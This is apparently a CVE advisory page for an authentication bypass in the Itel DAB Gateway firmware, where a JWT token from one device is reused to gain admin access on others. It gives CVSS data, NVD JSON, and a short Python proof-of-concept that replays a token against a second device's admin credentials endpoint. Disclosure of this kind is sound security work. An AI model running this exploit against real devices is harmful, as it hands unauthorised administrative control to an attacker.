Security Vulnerability Report
中文
CVE-2025-63216 CVSS 10.0 CRITICAL

CVE-2025-63216

Published: 2025-11-18 22:15:52
Last Modified: 2026-01-15 21:54:41
Source: [email protected]

Description

The Itel DAB Gateway (IDGat build c041640a) is vulnerable to Authentication Bypass due to improper JWT validation across devices. Attackers can reuse a valid JWT token obtained from one device to authenticate and gain administrative access to any other device running the same firmware, even if the passwords and networks are different. This allows full compromise of affected devices.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:itel:idgateway_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:itel:idgateway:-:*:*:*:*:*:*:* - NOT VULNERABLE
Itel DAB Gateway (IDGat) build c041640a

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # Target device 1: Get valid JWT token target1 = "http://victim1-itel-dab.local/api/login" payload1 = {"username": "admin", "password": "any_password"} response1 = requests.post(target1, json=payload1) jwt_token = response1.json().get('token') # Target device 2: Use the same JWT token to bypass authentication target2 = "http://victim2-itel-dab.local/api/admin/credentials" headers = {"Authorization": f"Bearer {jwt_token}"} response2 = requests.get(target2, headers=headers) # If vulnerable, this will return admin access to device 2 print(f"Status: {response2.status_code}") print(f"Response: {response2.text}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63216", "sourceIdentifier": "[email protected]", "published": "2025-11-18T22:15:51.597", "lastModified": "2026-01-15T21:54:41.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Itel DAB Gateway (IDGat build c041640a) is vulnerable to Authentication Bypass due to improper JWT validation across devices. Attackers can reuse a valid JWT token obtained from one device to authenticate and gain administrative access to any other device running the same firmware, even if the passwords and networks are different. This allows full compromise of affected devices."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-384"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:itel:idgateway_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "30618467-A73C-43E6-94BB-E2285839C4AE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:itel:idgateway:-:*:*:*:*:*:*:*", "matchCriteriaId": "6BEFCB56-7415-4D21-9C3B-1BC434902E22"}]}]}], "references": [{"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63216_Itel%20DAB%20Gateway%20Authentication%20Bypass", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Mitigation"]}, {"url": "https://www.itel.it/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.